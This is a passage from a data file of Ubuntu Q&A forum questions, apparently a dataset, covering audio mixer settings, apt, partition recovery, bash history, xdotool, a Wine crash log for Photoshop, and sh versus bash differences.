3 value.1 3 comment { access 'read write' type integer count 2 range '0 - 3' dbmin 0 dbmax 3000 dbvalue.0 3000 dbvalue.1 3000 } } control.20 { iface mixer name 'rear mic boost volume' value.0 0 value.1 0 comment { access 'read write' type integer count 2 range '0 - 3' dbmin 0 dbmax 3000 dbvalue.0 0 dbvalue.1 0 } } control.21 { iface mixer name 'capture switch' value.0 true value.1 true comment { access 'read write' type boolean count 2 } } control.22 { iface mixer name 'capture switch' index 1 value.0 false value.1 false comment { access 'read write' type boolean count 2 } } control.23 { iface mixer name 'capture volume' value.0 45 value.1 45 comment { access 'read write' type integer count 2 range '0 - 46' dbmin -1600 dbmax 3000 dbvalue.0 2900 dbvalue.1 2900 } } control.24 { iface mixer name 'capture volume' index 1 value.0 22 value.1 22 comment { access 'read write' type integer count 2 range '0 - 46' dbmin -1600 dbmax 3000 dbvalue.0 600 dbvalue.1 600 } } control.25 { iface mixer name 'input source' value 'front mic' comment { access 'read write' type enumerated count 1 item.0 'front mic' item.1 'rear mic' item.2 line } } control.26 { iface mixer name 'input source' index 1 value 'front mic' comment { access 'read write' type enumerated count 1 item.0 'front mic' item.1 'rear mic' item.2 line } } control.27 { iface mixer name 'iec958 playback con mask' value '0fff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.28 { iface mixer name 'iec958 playback pro mask' value '0f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.29 { iface mixer name 'iec958 playback default' value '0400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access 'read write' type iec958 count 1 } } control.30 { iface mixer name 'iec958 playback switch' value false comment { access 'read write' type boolean count 1 } } control.31 { iface mixer name 'iec958 default pcm playback switch' value true comment { access 'read write' type boolean count 1 } } control.32 { iface mixer name 'master playback volume' value 63 comment { access 'read write' type integer count 1 range '0 - 64' dbmin -6400 dbmax 0 dbvalue.0 -100 } } control.33 { iface mixer name 'master playback switch' value true comment { access 'read write' type boolean count 1 } } control.34 { iface card name 'line out jack' value false comment { access read type boolean count 1 } } control.35 { iface card name 'front headphone jack' value false comment { access read type boolean count 1 } } control.36 { iface card name 'front mic jack' value false comment { access read type boolean count 1 } } control.37 { iface card name 'rear mic jack' value false comment { access read type boolean count 1 } } control.38 { iface card name 'line jack' value false comment { access read type boolean count 1 } } control.39 { iface card name 'spdif phantom jack' value true comment { access read type boolean count 1 } } control.40 { iface pcm name 'playback channel map' value.0 0 value.1 0 comment { access read type integer count 2 range '0 - 36' } } control.41 { iface pcm name 'capture channel map' value.0 0 value.1 0 comment { access read type integer count 2 range '0 - 36' } } control.42 { iface pcm device 1 name 'playback channel map' value.0 0 value.1 0 comment { access read type integer count 2 range '0 - 36' } } control.43 { iface pcm device 2 name 'capture channel map' value.0 0 value.1 0 comment { access read type integer count 2 range '0 - 36' } } control.44 { iface mixer name 'pcm playback volume' value.0 254 value.1 254 comment { access 'read write user' type integer count 2 range '0 - 255' tlv '0000000100000008ffffec1400000014' dbmin -5100 dbmax 0 dbvalue.0 -20 dbvalue.1 -20 } } }
422465	command to run gui frontend for apt-get update	i want know , if there is any command to run apt-get update in gui like in the picture following : all i want to do is to write a script which will update the software sources through this gui manager . so that i can make it more user friendly . i need the command to do this . please help .
422466	ip messenger showing error on ubuntu 12.04	i installed gnome ip messenger from terminal bu using the following command in my ubuntu 12.04 unity desktop sudo apt-get install g2ipmsg but it is giving the following error as already mentioned in 1 , 2 filename : ipmsg.c function : create_lock_file line:157 can not setup lock file : /tmp/g2ipmsg.lock errno : -11 ( resource temporarily unavailable ) i already tried them and they are not working . by following the 1 , the ipmsg is not even showing the error . can anybody help me
422468	ext4 partition lost ?	booted up from live media ( ubuntu 12.04 ) with hdd ( 3tb , guid , single ext4 partition used for storing data and nothing else ) connected via sata . for some reason the file system was only allowing `` read only '' access so i decided to unmount . i opened up `` disk utility '' and just clicked `` mount '' for the heck of it . for whatever reason it hung ( and did n't actually end up finishing mount ) ... so i got impatient and did a sysreq+reisuo thing , but the system never shut off.. got impatient again and just pulled the plug . rebooted to find my that there is no longer any partition found on the device . so basically.. i damaged , corrupted , destroyed , whatever my ext4 filesystem.. ? obviously all the data is still sitting there..right ? i 'm prob gon na go ahead and write block + dd the whole thing before before i do anything else , just 'cause.. when i get a hold of a spare 3 tb drive in the near future ... that said.. what do i do , if anything , to get my partition and all the data on that partition back ? what happened ? how do i go about not losing 3 tb worth of data that i had n't backed up yet ?
422470	how to clear history on logout	i tried adding history -c to ~/.bash_logout but seems not working . add : i 'm having success by adding these lines into my ~/.bashrc ( referred from here ) unset histfile export lesshistfile= '' - '' i still do n't know why history -c method wo n't work .
422474	which one is best js minifier used in ubuntu	i have the big project developed in the javascript framework . hence its necessary to minify all the js so as the speed may enhance . please tell which js minifier software will best option ?
422480	xdotool ca n't type `` y ''	for a small automation process i am using xdotool because i need my script to ssh into a virtual machine and execute commands there . after upgrading ubuntu to 13.10 , it seems like xdotool ca n't type y correctly anymore . even a simple xdotool type -- clearmodifiers `` y '' leads to â being typed . it seems to work just fine for characters other than y. i tried un- and reinstalling xdotool , but no success . any ideas or suggestions on how to fix this ? i have xdotool with version 3.20130505.1 and am using a dell latitude e6530 with ubuntu 13.10 . edit : output of gsettings list-recursively org.gnome.desktop.input-sources : org.gnome.desktop.input-sources current uint32 0 org.gnome.desktop.input-sources per-window false org.gnome.desktop.input-sources show-all-sources false org.gnome.desktop.input-sources sources [ ( 'xkb ' , 'de ' ) ] org.gnome.desktop.input-sources xkb-options @ as [ ]
422481	how to prevent usb drives from auto-remounting after remove	when i press `` safely remove drive '' in nautilus as user to my usb 3.0 transcent storejet 25h3 drive it reconnects immediately . how can i safely remove it without that behaviour ? i think the only solution is to disable the automounting in ubuntu . i did that now with : how to disable automount in nautilus 's preferences but it is a shame , cause now my external music library does n't automount anymore . is n't there a solution where harddisks do n't remount on safely remove ?
422483	how to disable thermal shutdown	it 's not that i want to totally disable thermal protection , but instead of instantly turn-off the machine , how can i make my ubuntu 12.04 sleep or hibernate instead . as a programmer my ide and project breaks when closed improperly . is there a solution to hibernate or sleep when thermal peak is reached ? update : the laptop i have does not thermal shutdown at random times , it shutdowns when i am compiling ( java app ) , when cpu usage is at max , when just browsing the internet no problem , so the problem is with the hardware . it does not happen everytime , i just want that when it happens it will just hibernate or sleep .
422484	adobe photoshop cc crashes through playonlinux	i have installed adobe photoshop cc using playonlinux and following this tutorial . my computer is a dell inspiron 3537 ( here 's the spcifications ) , i 'm using a 64 bit ubuntu 12.04 , with wine 1.6 and playonlinux 4.2 . the installation uses a 32bit virtual drive of windows7 . everything was working fine , no bugs during the installation . when i try to run adobe cc through pol , everything seems to be working ( i get an error message that 3d features requires more ram but i 'm not sure that 's relevant ) , but when i try to open any file at all , it crashes . here 's the error log : unhandled exception : page fault on read access to 0x8904478b in 32-bit code ( 0x8904478b ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:8904478b esp:0032d344 ebp:0032d3ac eflags:00210212 ( r- -- i -a- - ) eax:8904478b ebx:00000000 ecx:0068cb64 edx:0032d3b8 esi:00000000 edi:0032d3d7 stack dump : 0x0032d344 : 0168c9d8 0032d39c 00000001 0032d3b8 0x0032d354 : 00000000 40ddc85a 072f6390 0c184af0 0x0032d364 : f5090ff4 00000000 f5067caf 072f6390 0x0032d374 : 0274db2c 0032d394 0032d3c4 072f6394 0x0032d384 : 0032d39c 00000001 072f6394 0c184af0 0x0032d394 : 00000000 0d5a7af8 0068cb64 0032e5bc backtrace : = > 0 0x8904478b ( 0x0032d3ac ) 1 0x0168cb78 in photoshop ( +0x128cb77 ) ( 0x0032d3c8 ) 2 0xf506cbc2 in comdlg32 ( +0x2cbc1 ) ( 0x0032d438 ) 3 0x7e367972 in shell32 ( +0x27971 ) ( 0x0032d498 ) 4 0x7e3bfc81 in shell32 ( +0x7fc80 ) ( 0x0032d4f8 ) 5 0x7e3c3b55 in shell32 ( +0x83b54 ) ( 0x0032d6a8 ) 6 0x7e3c48d1 in shell32 ( +0x848d0 ) ( 0x0032d748 ) 7 0x7ec342ba winproc_wrapper+0x19 ( ) in user32 ( 0x0032d788 ) 8 0x7ec3499c in user32 ( +0xa499b ) ( 0x0032d7d8 ) 9 0x7ec370b5 in user32 ( +0xa70b4 ) ( 0x0032d828 ) 10 0x7ebf54be in user32 ( +0x654bd ) ( 0x0032d898 ) 11 0x7ebfc856 in user32 ( +0x6c855 ) ( 0x0032d908 ) 12 0x7ebfcd29 sendmessagew+0x58 ( ) in user32 ( 0x0032d958 ) 13 0x7e269b5e in comctl32 ( +0x39b5d ) ( 0x0032d9a8 ) 14 0x7e2757d3 in comctl32 ( +0x457d2 ) ( 0x0032da88 ) 15 0x7e275eeb in comctl32 ( +0x45eea ) ( 0x0032db18 ) 16 0x7e276de4 in comctl32 ( +0x46de3 ) ( 0x0032dbd8 ) 17 0x7e2773be in comctl32 ( +0x473bd ) ( 0x0032dc68 ) 18 0x7e27c7b9 in comctl32 ( +0x4c7b8 ) ( 0x0032dd68 ) 19 0x7e28362f in comctl32 ( +0x5362e ) ( 0x0032de78 ) 20 0x7ec342ba winproc_wrapper+0x19 ( ) in user32 ( 0x0032deb8 ) 21 0x7ec3499c in user32 ( +0xa499b ) ( 0x0032df08 ) 22 0x7ec370b5 in user32 ( +0xa70b4 ) ( 0x0032df58 ) 23 0x7ebf74b2 dispatchmessagew+0xb1 ( ) in user32 ( 0x0032e068 ) 24 0x7ebc37b8 isdialogmessagew+0x137 ( ) in user32 ( 0x0032e1d8 ) 25 0x7ebc4187 in user32 ( +0x34186 ) ( 0x0032e258 ) 26 0x7ebc6449 dialogboxparamw+0x98 ( ) in user32 ( 0x0032e2a8 ) 27 0xf506aa97 in comdlg32 ( +0x2aa96 ) ( 0x0032e2f8 ) 28 0xf5066e96 in comdlg32 ( +0x26e95 ) ( 0x0032e328 ) 29 0x0169062b in photoshop ( +0x129062a ) ( 0x0032e5c8 ) 30 0x01690a22 in photoshop ( +0x1290a21 ) ( 0x0032e95c ) 31 0x0165aca2 in photoshop ( +0x125aca1 ) ( 0x0032e9f4 ) 32 0x016abf48 in photoshop ( +0x12abf47 ) ( 0x0032ea28 ) 33 0x00f44339 in photoshop ( +0xb44338 ) ( 0x0032eacc ) 34 0x015f45f9 in photoshop ( +0x11f45f8 ) ( 0x0032eae8 ) 35 0x0163dded in photoshop ( +0x123ddec ) ( 0x0032eb28 ) 36 0x0166188f in photoshop ( +0x126188e ) ( 0x0032eb88 ) 37 0x0164bd5c in photoshop ( +0x124bd5b ) ( 0x0032ebbc ) 38 0x0167f223 in photoshop ( +0x127f222 ) ( 0x0032ec1c ) 39 0x0164d49b in photoshop ( +0x124d49a ) ( 0x0032eee8 ) 40 0x7ec342ba winproc_wrapper+0x19 ( ) in user32 ( 0x0032ef18 ) 41 0x7ec3499c in user32 ( +0xa499b ) ( 0x0032ef68 ) 42 0x7ec37351 callwindowprocw+0x60 ( ) in user32 ( 0x0032efb0 ) 43 0x03c1768c in adobeowl ( +0x2768b ) ( 0x0032f120 ) 44 0x03c2e6bf in adobeowl ( +0x3e6be ) ( 0x0032f18c ) 45 0x03c343c6 in adobeowl ( +0x443c5 ) ( 0x0032f1cc ) 46 0x0071268f in photoshop ( +0x31268e ) ( 0x0032f208 ) 47 0x7ec342ba winproc_wrapper+0x19 ( ) in user32 ( 0x0032f238 ) 48 0x7ec3499c in user32 ( +0xa499b ) ( 0x0032f288 ) 49 0x7ec370b5 in user32 ( +0xa70b4 ) ( 0x0032f2d8 ) 50 0x7ebf54be in user32 ( +0x654bd ) ( 0x0032f348 ) 51 0x7ebfc856 in user32 ( +0x6c855 ) ( 0x0032f3b8 ) 52 0x7ebfcd29 sendmessagew+0x58 ( ) in user32 ( 0x0032f400 ) 53 0x03c7ef5a in adobeowl ( +0x8ef59 ) ( 0x0032f460 ) 54 0x03c7dfcb in adobeowl ( +0x8dfca ) ( 0x0032f490 ) 55 0x03c2e6bf in adobeowl ( +0x3e6be ) ( 0x0032f4f8 ) 56 0x03c343c6 in adobeowl ( +0x443c5 ) ( 0x0032f538 ) 57 0x7ec342ba winproc_wrapper+0x19 ( ) in user32 ( 0x0032f568 ) 58 0x7ec3499c in user32 ( +0xa499b ) ( 0x0032f5b8 ) 59 0x7ec370b5 in user32 ( +0xa70b4 ) ( 0x0032f608 ) 60 0x7ebf74b2 dispatchmessagew+0xb1 ( ) in user32 ( 0x0032f718 ) 61 0x01686c74 in photoshop ( +0x1286c73 ) ( 0x0032f7d0 ) 62 0x016abdaa in photoshop ( +0x12abda9 ) ( 0x0032f810 ) 63 0x00695568 in photoshop ( +0x295567 ) ( 0x0032f96c ) 64 0x01688e44 in photoshop ( +0x1288e43 ) ( 0x0032fdcc ) 65 0x01767f1d in photoshop ( +0x1367f1c ) ( 0x0032fe60 ) 66 0x7b85f33c call_process_entry+0xb ( ) in kernel32 ( 0x0032fe78 ) 67 0x7b8605bb in kernel32 ( +0x505ba ) ( 0x0032feb8 ) 68 0x7bc7a120 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0032fed8 ) 69 0x7bc7d12d call_thread_func+0x7c ( ) in ntdll ( 0x0032ffa8 ) 70 0x7bc7a0fe rtlraiseexception+0x21 ( ) in ntdll ( 0x0032ffc8 ) 71 0x7bc4e75e call_dll_entry_point+0x33d ( ) in ntdll ( 0x0032ffe8 ) 72 0xf75fd76d wine_call_on_stack+0x1c ( ) in libwine.so.1 ( 0x00000000 ) 73 0xf75fd82b wine_switch_to_stack+0x2a ( ) in libwine.so.1 ( 0xffb32238 ) 74 0x7bc545c0 ldrinitializethunk+0x3af ( ) in ntdll ( 0xffb322a8 ) 75 0x7b866b92 __wine_kernel_init+0xa21 ( ) in kernel32 ( 0xffb33458 ) 76 0x7bc54d7b __wine_process_init+0x25a ( ) in ntdll ( 0xffb334e8 ) 77 0xf75faccc wine_init+0x2db ( ) in libwine.so.1 ( 0xffb33558 ) 78 0x7bf00f43 main+0xf2 ( ) in < wine-loader > ( 0xffb339a8 ) 79 0xf74244d3 __libc_start_main+0xf2 ( ) in libc.so.6 ( 0x00000000 ) 0x8904478b : -- no code accessible -- modules : module address debug info name ( 222 modules ) pe 330000- 38a000 deferred cggl pe 390000- 3cb000 deferred tbb pe 3d0000- 3d9000 deferred adbeape pe 400000- 37d7000 export photoshop pe 37e0000- 3871000 deferred sccore pe 3880000- 3b75000 deferred patchmatch pe 3b80000- 3bed000 deferred adobe_caps pe 3bf0000- 3d65000 export adobeowl pe 3d70000- 3dae000 deferred ahclient pe 3db0000- 3e57000 deferred axedomcore pe 3e60000- 42e4000 deferred mps pe 42f0000- 47d8000 deferred plugplugowl pe 4b30000- 4b32000 deferred psart pe 50d0000- 5100000 deferred tbbmalloc pe 5b50000- 5cc3000 deferred adobelinguistic pe 6480000- 64cd000 deferred logsession pe 64e0000- 64ed000 deferred fastcore.8bx pe 64f0000- 6687000 deferred photoshop pe 6690000- 68ee000 deferred psviews pe 6c10000- 6c89000 deferred multiprocessor support.8bx pe 6c90000- 6caa000 deferred plugin pe 7320000- 7505000 deferred amtlib pe 7610000- 763c000 deferred axe8sharedexpat pe 9210000- 922e000 deferred adbeapecore pe 9310000- 935b000 deferred adobexmp pe 9bd0000- 9c87000 deferred mmxcore.8bx pe 9c90000- a069000 deferred libmmd pe a430000- a4ac000 deferred updaternotifications pe ac90000- b39d000 deferred svml_dispmd pe c6a0000- ccfe000 deferred dicom.8bi pe eb30000- eb7e000 deferred bib pe ec90000- ecd1000 deferred bibutils pe edf0000- efdc000 deferred ace pe f0f0000- f476000 deferred agm pe f590000- f889000 deferred cooltype pe ffb0000- fff6000 deferred servicemanager-launcher pe 10000000-100a4000 deferred extendscript pe 15540000-15674000 deferred wrservices pe 15780000-159ab000 deferred scriptingsupport.8li pe 159b0000-15a60000 deferred scriptuiflex pe 16460000-16d45000 deferred adbeapeengine pe 18bd0000-18cfd000 deferred imslib pe 4ec50000-4edfb000 deferred gdiplus pe 4fad0000-51375000 deferred camera raw.8bi pe 6a000000-6a63a000 deferred cg pe 78050000-780b9000 deferred msvcp100 pe 78aa0000-78b5f000 deferred msvcr100 elf 7b800000-7ba5b000 dwarf kernel32 < elf > \-pe 7b810000-7ba5b000 \ kernel32 elf 7bc00000-7bcdc000 dwarf ntdll < elf > \-pe 7bc10000-7bcdc000 \ ntdll elf 7bf00000-7bf04000 dwarf < wine-loader > elf 7d6a2000-7d6d8000 deferred uxtheme < elf > \-pe 7d6b0000-7d6d8000 \ uxtheme elf 7d6d8000-7d6dd000 deferred libgpg-error.so.0 elf 7d6dd000-7d6f5000 deferred libresolv.so.2 elf 7d6f5000-7d6f9000 deferred libkeyutils.so.1 elf 7d6f9000-7d742000 deferred libdbus-1.so.3 elf 7d742000-7d754000 deferred libp11-kit.so.0 elf 7d754000-7d7d9000 deferred libgcrypt.so.11 elf 7d7d9000-7d7eb000 deferred libtasn1.so.3 elf 7d7eb000-7d813000 deferred libk5crypto.so.3 elf 7d813000-7d8e2000 deferred libkrb5.so.3 elf 7d8e2000-7d8f4000 deferred libavahi-client.so.3 elf 7d8f4000-7d9b8000 deferred libgnutls.so.26 elf 7d9b8000-7d9f6000 deferred libgssapi_krb5.so.2 elf 7d9f6000-7da49000 deferred libcups.so.2 elf 7da67000-7da6d000 deferred libxfixes.so.3 elf 7da6d000-7da78000 deferred libxcursor.so.1 elf 7da78000-7da89000 deferred libxi.so.6 elf 7da89000-7da8d000 deferred libxcomposite.so.1 elf 7da8d000-7da96000 deferred libxrandr.so.2 elf 7da96000-7daa0000 deferred libxrender.so.1 elf 7daa0000-7daa6000 deferred libxxf86vm.so.1 elf 7daa6000-7daaa000 deferred libxinerama.so.1 elf 7daaa000-7dab1000 deferred libxdmcp.so.6 elf 7dab1000-7dab5000 deferred libxau.so.6 elf 7dab5000-7dad6000 deferred libxcb.so.1 elf 7dad6000-7dc0a000 deferred libx11.so.6 elf 7dc0a000-7dc1c000 deferred libxext.so.6 elf 7dc1c000-7dc25000 deferred libkrb5support.so.0 elf 7dc25000-7dc2a000 deferred libcom_err.so.2 elf 7dc2a000-7dc38000 deferred libavahi-common.so.3 elf 7dc3a000-7dccc000 deferred winex11 < elf > \-pe 7dc40000-7dccc000 \ winex11 elf 7dd23000-7dd4d000 deferred libexpat.so.1 elf 7dd4d000-7dd81000 deferred libfontconfig.so.1 elf 7dd81000-7de1b000 deferred libfreetype.so.6 elf 7de1b000-7dee9000 deferred crypt32 < elf > \-pe 7de20000-7dee9000 \ crypt32 elf 7dee9000-7e01d000 deferred oleaut32 < elf > \-pe 7df00000-7e01d000 \ oleaut32 elf 7e01d000-7e044000 deferred mpr < elf > \-pe 7e020000-7e044000 \ mpr elf 7e044000-7e0bf000 deferred wininet < elf > \-pe 7e050000-7e0bf000 \ wininet elf 7e0bf000-7e200000 deferred msvcp90 < elf > \-pe 7e100000-7e200000 \ msvcp90 elf 7e200000-7e22d000 deferred msvcr90 < elf > \-pe 7e210000-7e22d000 \ msvcr90 elf 7e22d000-7e335000 dwarf comctl32 < elf > \-pe 7e230000-7e335000 \ comctl32 elf 7e335000-7e568000 dwarf shell32 < elf > \-pe 7e340000-7e568000 \ shell32 elf 7e568000-7e5a8000 deferred winspool < elf > \-pe 7e570000-7e5a8000 \ winspool elf 7e5a8000-7e5e5000 deferred winhttp < elf > \-pe 7e5b0000-7e5e5000 \ winhttp elf 7e5e5000-7e61b000 deferred ws2_32 < elf > \-pe 7e5f0000-7e61b000 \ ws2_32 elf 7e61b000-7e729000 deferred opengl32 < elf > \-pe 7e640000-7e729000 \ opengl32 elf 7e729000-7e7a3000 deferred shlwapi < elf > \-pe 7e740000-7e7a3000 \ shlwapi elf 7e7a3000-7e7dc000 deferred liblcms.so.1 elf 7e7fa000-7e81b000 deferred mscms < elf > \-pe 7e800000-7e81b000 \ mscms elf 7e81b000-7e89c000 deferred rpcrt4 < elf > \-pe 7e830000-7e89c000 \ rpcrt4 elf 7e89c000-7e9d8000 deferred ole32 < elf > \-pe 7e8b0000-7e9d8000 \ ole32 elf 7e9d8000-7e9f2000 deferred version < elf > \-pe 7e9e0000-7e9f2000 \ version elf 7e9f2000-7ea61000 deferred advapi32 < elf > \-pe 7ea00000-7ea61000 \ advapi32 elf 7ea61000-7eb7e000 deferred gdi32 < elf > \-pe 7ea70000-7eb7e000 \ gdi32 elf 7eb7e000-7ecd9000 dwarf user32 < elf > \-pe 7eb90000-7ecd9000 \ user32 elf 7ecd9000-7ed83000 deferred msvcrt < elf > \-pe 7ecf0000-7ed83000 \ msvcrt elf 7ef83000-7ef90000 deferred libnss_files.so.2 elf 7ef90000-7ef9c000 deferred libnss_nis.so.2 elf 7ef9c000-7efb6000 deferred libnsl.so.1 elf 7efb6000-7efe2000 deferred libm.so.6 elf 7efe3000-7eff9000 deferred libz.so.1 elf f49dd000-f4a08000 deferred libvorbis.so.0 elf f4a08000-f4b80000 deferred libvorbisenc.so.2 elf f4b80000-f4bce000 deferred libflac.so.8 elf f4bce000-f4c40000 deferred libsndfile.so.1 elf f4c40000-f4ca5000 deferred libpulsecommon-1.1.so elf f4ca5000-f4cf3000 deferred libpulse.so.0 elf f4d11000-f4d39000 deferred winepulse < elf > \-pe f4d20000-f4d39000 \ winepulse elf f4d39000-f4d5b000 deferred mmdevapi < elf > \-pe f4d40000-f4d5b000 \ mmdevapi elf f4d5b000-f4d70000 deferred schannel < elf > \-pe f4d60000-f4d70000 \ schannel elf f4d70000-f4da3000 deferred secur32 < elf > \-pe f4d80000-f4da3000 \ secur32 elf f4da3000-f4dcb000 deferred mlang < elf > \-pe f4db0000-f4dcb000 \ mlang elf f4dcb000-f4e33000 deferred dbghelp < elf > \-pe f4dd0000-f4e33000 \ dbghelp elf f4e33000-f4e53000 deferred dnsapi < elf > \-pe f4e40000-f4e53000 \ dnsapi elf f4e53000-f4e9b000 deferred dsound < elf > \-pe f4e60000-f4e9b000 \ dsound elf f4e9b000-f4f3e000 deferred urlmon < elf > \-pe f4eb0000-f4f3e000 \ urlmon elf f4f3e000-f503c000 deferred msi < elf > \-pe f4f50000-f503c000 \ msi elf f503c000-f5128000 dwarf comdlg32 < elf > \-pe f5040000-f5128000 \ comdlg32 elf f5606000-f5631000 deferred msacm32 < elf > \-pe f5610000-f5631000 \ msacm32 elf f5631000-f5649000 deferred wtsapi32 < elf > \-pe f5640000-f5649000 \ wtsapi32 elf f5649000-f566d000 deferred dwrite < elf > \-pe f5650000-f566d000 \ dwrite elf f566d000-f56af000 deferred usp10 < elf > \-pe f5670000-f56af000 \ usp10 elf f56af000-f56dc000 deferred netapi32 < elf > \-pe f56c0000-f56dc000 \ netapi32 elf f56dc000-f5800000 deferred actxprxy < elf > \-pe f5700000-f5800000 \ actxprxy elf f5904000-f5925000 deferred cabinet < elf > \-pe f5910000-f5925000 \ cabinet elf f5925000-f59df000 deferred winmm < elf > \-pe f5930000-f59df000 \ winmm elf f59df000-f5a00000 deferred oleacc < elf > \-pe f59e0000-f5a00000 \ oleacc elf f5b02000-f5b0a000 deferred libogg.so.0 elf f5b64000-f5ca5000 deferred wined3d < elf > \-pe f5b70000-f5ca5000 \ wined3d elf f6d78000-f6d99000 deferred explorerframe < elf > \-pe f6d80000-f6d99000 \ explorerframe elf f6d99000-f6ddb000 deferred rsaenh < elf > \-pe f6da0000-f6ddb000 \ rsaenh elf f6ddb000-f6de2000 deferred libnss_dns.so.2 elf f7104000-f711a000 deferred dwmapi < elf > \-pe f7110000-f711a000 \ dwmapi elf f711a000-f7138000 deferred libgcc_s.so.1 elf f713a000-f7156000 deferred wsock32 < elf > \-pe f7140000-f7156000 \ wsock32 elf f7156000-f716a000 deferred msimg32 < elf > \-pe f7160000-f716a000 \ msimg32 elf f716a000-f7190000 deferred dxgi < elf > \-pe f7170000-f7190000 \ dxgi elf f7190000-f7200000 deferred setupapi < elf > \-pe f71a0000-f7200000 \ setupapi elf f7305000-f730f000 deferred libwrap.so.0 elf f734b000-f737c000 deferred wbemprox < elf > \-pe f7350000-f737c000 \ wbemprox elf f737c000-f73a2000 deferred iphlpapi < elf > \-pe f7380000-f73a2000 \ iphlpapi elf f73a2000-f73c7000 deferred imm32 < elf > \-pe f73b0000-f73c7000 \ imm32 elf f73c7000-f73ec000 deferred sti < elf > \-pe f73d0000-f73ec000 \ sti elf f73ec000-f7400000 deferred psapi < elf > \-pe f73f0000-f7400000 \ psapi elf f7401000-f740a000 deferred libnss_compat.so.2 elf f740b000-f75b5000 dwarf libc.so.6 elf f75b5000-f75ba000 deferred libdl.so.2 elf f75bb000-f75d6000 deferred libpthread.so.0 elf f75d7000-f75e0000 deferred librt.so.1 elf f75e1000-f75e8000 deferred libasyncns.so.0 elf f75e8000-f75f0000 deferred libjson.so.0 elf f75f4000-f77aa000 dwarf libwine.so.1 elf f77ac000-f77ce000 deferred ld-linux.so.2 elf f77ce000-f77cf000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 00000008 ( d ) c : \program files\adobe\adobe photoshop cc\photoshop.exe 00000096 0 00000095 0 00000093 0 0000008f 0 0000008b 0 00000088 0 00000087 0 00000086 0 00000085 15 00000084 0 00000083 0 00000082 0 00000081 0 00000080 0 0000007f 0 0000007e 0 0000007d 0 0000007c 0 0000007b 0 0000007a 0 00000079 0 00000078 0 00000077 0 00000076 0 00000075 0 00000074 0 00000073 0 00000072 0 00000071 0 00000070 0 0000006f 0 0000006e 0 0000006d 0 0000006c 0 0000006b 0 0000006a 0 00000069 0 00000068 0 00000032 0 0000002e 0 00000067 0 00000066 0 00000065 0 00000064 0 00000063 0 00000062 0 00000061 0 00000060 0 0000005f 0 0000005e 0 0000005d 0 0000005c 0 0000005b 0 0000005a 0 00000059 0 00000058 0 00000057 0 00000056 0 00000055 0 00000054 0 00000053 0 00000052 0 00000050 0 0000004f 0 0000003e 0 00000043 0 0000003c 0 0000001e 0 0000002c 0 0000002d 0 00000024 0 00000025 0 0000000b 0 0000000d 0 0000000c 0 00000044 0 00000040 0 0000002b 0 0000002a 0 00000029 0 00000028 0 00000027 0 00000021 0 00000009 0 < == 0000000e services.exe 00000037 0 00000036 0 0000001d 0 00000014 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001c 0 00000019 0 00000017 0 00000013 0 0000001a plugplay.exe 00000020 0 0000001f 0 0000001b 0 00000022 explorer.exe 00000026 0 00000023 0 00000034 svchost.exe 00000047 0 00000046 0 00000041 0 0000003d 0 0000003b 0 0000003a 0 00000038 0 00000035 0 0000003f rpcss.exe 00000051 0 0000004e 0 0000004d 0 0000004c 0 0000004b 0 0000004a 0 00000049 0 00000042 0 00000045 0 00000090 cepservicemanager.exe 00000094 0 00000092 0 00000091 0 system information : wine build : wine-1.6.1 platform : i386 host system : linux host version : 3.11.0-15-generic i have no idea what this means . any ideas how i should attempt to fix this ? what should i check ? etc .
422487	headphones noise , turning on and off	i have a dell xps13 9333 running ubuntu 12.04 . speakers are working ok , while there are issues using headphones . headphone are muted when there is no audio playing ( that 's ok ) , than when the audio starts playing ( for example , a skype message arrives ... but that is true for all kind of audio ) i can hear a loud wave sound like in non tuned radios , which goes off a little bit later the audio stops playing . typing in terminal sudo aplay -l i get card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc668 analog [ alc668 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 can you help me ?
422490	aws marketplace ubuntu ami are not compatible with m3 instances	amazon aws has recently released 2 types of instances : m3.medium and m3.large , which seem to be the `` new generation '' after m1.medium and m1.large . we wanted to upgrade our instance , based on a aws marketplace ubuntu server 10.04 lts , from m1.large to m3.large , but the following error occured : '' the instance configuration for this aws marketplace product is not supported . please see http : //aws.amazon.com/marketplace/pp ? sku=drdu2rihnd8bagnjz0tfmp4mr for more information about supported instance types , regions , and operating systems . '' indeed , the aws marketplace listing for ubuntu 10.04 , and later , do n't allow the new m3.large instance types . if there is no technical limitation , how could we get this listing updated ?
422492	why script with /bin/bash is working , with /bin/sh not ?	my friend asked me why this two simple script are not working in both shells : test file `` abc.txt '' : aaa 111 bbb 111 ccc 111 ddd script # 1 ( a ) : # ! /bin/sh while read -r line ; do echo `` processing $ line '' done < < ( grep 111 abc.txt ) output : ./a : line 4 : syntax error near unexpected token ` < ' ./a : line 4 : `done < < ( grep 111 abc.txt ) ' script # 2 ( b ) : # ! /bin/bash while read -r line ; do echo `` processing $ line '' done < < ( grep 111 abc.txt ) output : processing 111 processing 111 processing 111 i checked bash and sh on my machine and if i understand this correct this is the same thing . /bin/sh is just a link to /bin/bash : -rwxr-xr-x 1 root root 938736 may 10 2012 bash lrwxrwxrwx . 1 root root 4 feb 13 10:20 sh - > bash can someone explain me where is the difference ?
